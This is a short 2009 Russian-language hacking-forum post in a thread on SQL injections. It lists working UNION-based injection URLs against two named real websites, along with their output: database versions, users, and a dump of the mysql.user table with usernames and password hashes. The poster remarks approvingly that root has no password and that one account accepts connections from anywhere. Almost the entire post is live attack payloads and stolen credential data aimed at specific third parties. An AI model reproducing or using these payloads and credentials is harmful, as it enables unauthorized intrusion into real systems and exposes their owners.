Тема: SQL Инъекции
Показать сообщение отдельно

  #3  
Старый 04.06.2009, 14:32
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами: 9095366

Репутация: 298
По умолчанию
http://www.goldbio.com/seminar.php?seminarId=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a,version(),user(),database())
4.1.22:goldbiouser@localhost:GoldBio



http://lammp.bli.uci.edu/seminar.php?mode=abstract&id=-329+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5/*
5.0.45:root@localhost:events
мммм, как сладко

Вытаскиваем:
http://lammp.bli.uci.edu/seminar.php?mode=abstract&id=-329+union+select+1,2,concat_ws(0x3a,user,password, host),4,5+from+mysql.user/*

root::localhost
root::webhost.bli.uci.edu
root::127.0.0.1
ntroiwikiadmin:*8B8A4BCE24C00513D82A6DE18A58DD80DF B1E993:localhost
vpwikiuser:*0E2172CA358B9492A4D030BF3D06DF4EE75742 F0:%
vpwikiuser:*0E2172CA358B9492A4D030BF3D06DF4EE75742 F0:localhost
vpwikiuser:*0E2172CA358B9492A4D030BF3D06DF4EE75742 F0:localhost.localdomain

неплохо, root Без пароля, под vpwikiuser тоже множно подключиться откуда угодно
 
Ответить с цитированием